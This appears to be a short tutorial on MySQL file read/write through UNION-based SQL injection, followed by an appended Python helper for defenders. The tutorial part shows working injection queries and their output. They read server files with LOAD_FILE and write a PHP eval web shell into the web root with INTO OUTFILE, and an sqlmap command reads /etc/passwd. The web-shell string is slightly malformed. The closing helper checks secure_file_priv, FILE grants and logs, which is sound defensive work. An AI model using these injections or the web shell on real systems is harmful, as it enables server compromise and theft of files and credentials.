Conditions for reading/writing files:
1. The value of secure_file_priv must not be NULL
2. The absolute path to read from or write to must be known
3. Preferably a high-privilege account (root), since LOAD_FILE and INTO OUTFILE require the FILE privilege
Check the value of secure_file_priv:
mysql> show global variables like '%secure%';
+------------------+------------------------------+
| Variable_name    | Value                        |
+------------------+------------------------------+
| secure_auth      | OFF                          |
| secure_file_priv | C:\phpStudy\PHPTutorial\WWW\ |
+------------------+------------------------------+
2 rows in set (0.00 sec)
If the value is empty, open my.ini and add it there:
secure_file_priv = 'C:\phpStudy\PHPTutorial\WWW'
Check privileges (which database user the query runs as):
mysql> select * from admin where id = 1 union select 1,user(),3;
+------+----------------+----------+
| id   | username       | password |
+------+----------------+----------+
|    1 | admin          | 123      |
|    1 | root@localhost | 3        |
+------+----------------+----------+
2 rows in set (0.00 sec)
Read file contents:
mysql> select * from admin where id = 1 union select 1,load_file("C:\\phpStudy\\PHPTutorial\\WWW\\1.txt"),3;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    1 | admin    | 123      |
|    1 | 11111    | 3        |
+------+----------+----------+
2 rows in set (0.00 sec)
Write a file:
mysql> select * from admin where id = 1 union select 1,"<?php @eval($_GET['x']; ?)>",3 into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\1.php';
Query OK, 2 rows affected (0.00 sec)
The query succeeded and the 1.php we wrote was created in that directory.
Verify whether it can be executed.
Reading files with sqlmap
--file-read is used to read a local file from the database server:
sqlmap.py -u "http://xxx/x?id=1" --file-read=/etc/passwd
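As an added defender-side check (not part of this note): a Python helper that classifies a secure_file_priv setting against the web root, lists accounts whose GRANT statements confer the global FILE privilege, and flags general-log statements that use LOAD_FILE or INTO OUTFILE. The path, grants and log lines below are constructed sample values.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample values modelled on the session above, not read from a live server.
SECURE_FILE_PRIV = "C:\\phpStudy\\PHPTutorial\\WWW\\"
WEB_ROOT = "C:\\phpStudy\\PHPTutorial\\WWW"
GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT SELECT, INSERT ON `app`.* TO 'web'@'%'",
]
GENERAL_LOG = [
    "2024-01-01T10:00:01Z  12 Query  SELECT * FROM admin WHERE id = 1",
    "2024-01-01T10:00:02Z  12 Query  SELECT * FROM admin WHERE id = 1 UNION SELECT 1,LOAD_FILE('C:\\\\x\\\\1.txt'),3",
    "2024-01-01T10:00:03Z  12 Query  SELECT 1,'x',3 INTO OUTFILE 'C:\\\\x\\\\1.php'",
]

def assess_secure_file_priv(value, web_root):
    """Classify a secure_file_priv value. NULL disables LOAD_FILE/INTO OUTFILE entirely;
    an empty string allows any path; a directory inside the web root lets an injected
    INTO OUTFILE drop a file the web server will serve (and, for .php, execute)."""
    if value is None or value.strip().upper() == "NULL":
        return "ok", "file read/write disabled"
    if value.strip() == "":
        return "high", "empty value: any path readable/writable by the mysqld account"
    priv_dir = PureWindowsPath(value.rstrip("\\"))
    root = PureWindowsPath(web_root)
    if priv_dir == root or root in priv_dir.parents:
        return "high", f"{value} lies inside the web root {web_root}"
    return "medium", f"restricted to {value}; confirm it is outside every served directory"

# FILE is a global privilege: only ON *.* grants (or ALL PRIVILEGES ON *.*) confer it.
FILE_GRANT = re.compile(r"GRANT\s+(ALL PRIVILEGES|.*\bFILE\b).*?ON\s+\*\.\*\s+TO\s+('[^']*'@'[^']*')", re.I)

def accounts_with_file_priv(grant_lines):
    """Return the account strings whose SHOW GRANTS output includes the FILE privilege."""
    return [m.group(2) for line in grant_lines if (m := FILE_GRANT.search(line))]

# Statements that touch the filesystem; a web application's account has no business issuing them.
FILE_IO = re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b", re.I)

def find_file_io_queries(log_lines):
    """Return general-log lines containing LOAD_FILE(), INTO OUTFILE or INTO DUMPFILE."""
    return [line for line in log_lines if FILE_IO.search(line)]

if __name__ == "__main__":
    print(assess_secure_file_priv(SECURE_FILE_PRIV, WEB_ROOT))
    print(accounts_with_file_priv(GRANTS))
    for hit in find_file_io_queries(GENERAL_LOG):
        print("ALERT:", hit)
```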